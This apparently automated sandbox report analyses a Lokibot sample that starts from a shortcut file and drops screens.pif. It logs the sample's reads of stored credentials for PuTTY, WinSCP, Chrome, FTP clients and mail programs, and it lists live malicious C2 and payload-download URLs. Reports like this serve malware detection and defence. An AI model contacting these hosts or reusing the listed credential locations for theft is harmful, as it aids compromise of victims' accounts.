Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Queries volume information: C:\Users\user\Desktop\screens.pif VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\screens.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: screens.pif PID: 2208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: screens.pif PID: 688, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.2659632439.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\screens.pif	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\screens.pif

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\screens.pif	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\screens.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\screens.pif	Code function: PopPassword		5_2_0040D069
Source: C:\Users\user\Desktop\screens.pif	Code function: SmtpPassword		5_2_0040D069

Source: Yara match	File source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 PowerShell	1 DLL Side-Loading	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	2 Credentials in Registry	13 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	111 Process Injection	3 Obfuscated Files or Information	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	11 Process Discovery	Distributed Component Object Model	Input Capture	215 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Comprobante.lnk.lnk	42%	ReversingLabs	Script-PowerShell.Trojan.Jatommy
Comprobante.lnk.lnk	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Desktop\screens.pif	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://aka.ms/winsvr-2022-pshelp	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
freighteighttwocam.ddns.net	45.149.241.169	true	true		unknown
www.sodiumlaurethsulfatedesyroyer.com	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Reputation
http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php	true	unknown
http://kbfvzoboss.bid/alien/fre.php	true	unknown
http://alphastand.top/alien/fre.php	true	unknown
http://alphastand.win/alien/fre.php	true	unknown
http://alphastand.trade/alien/fre.php	true	unknown
https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1487508963.00000278262FE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp	false		unknown
